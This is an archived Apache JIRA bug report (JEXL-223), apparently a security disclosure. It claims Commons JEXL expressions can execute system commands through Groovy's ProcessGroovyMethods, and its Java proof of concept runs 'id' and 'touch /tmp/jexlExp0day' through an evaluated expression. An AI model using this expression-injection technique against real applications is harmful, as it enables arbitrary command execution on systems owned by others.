You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@commons.apache.org by "cnbird (JIRA)" <ji...@apache.org> on 2017/04/21 07:36:04 UTC
[jira] [Created] (JEXL-223) Apache Commons JEXL Expression Execute
Command Vulnerabilitity
cnbird created JEXL-223:
---------------------------
Summary: Apache Commons JEXL Expression Execute Command Vulnerabilitity
Key: JEXL-223
URL: https://issues.apache.org/jira/browse/JEXL-223
Project: Commons JEXL
Issue Type: Bug
Reporter: cnbird
Priority: Critical
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
0x02 POC
import java.io.IOException;
import java.util.List;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;
public class elExp {
public static void main(String args[]) throws IOException {
// Create or retrieve an engine
JexlEngine jexl = new JexlBuilder().create();
// Create an expression
//String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
ProcessGroovyMethods n = new ProcessGroovyMethods();
System.out.println(n.execute("id").toString());
String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
JexlExpression e = jexl.createExpression( jexlExp );
try {
Process process = new ProcessBuilder("id").start();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
// Create a context and add data
JexlContext jc = new MapContext();
jc.set("foo", jexlExp );
// Now evaluate the expression, getting the result
Object o = e.evaluate(jc);
System.out.println(o);
}
}
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)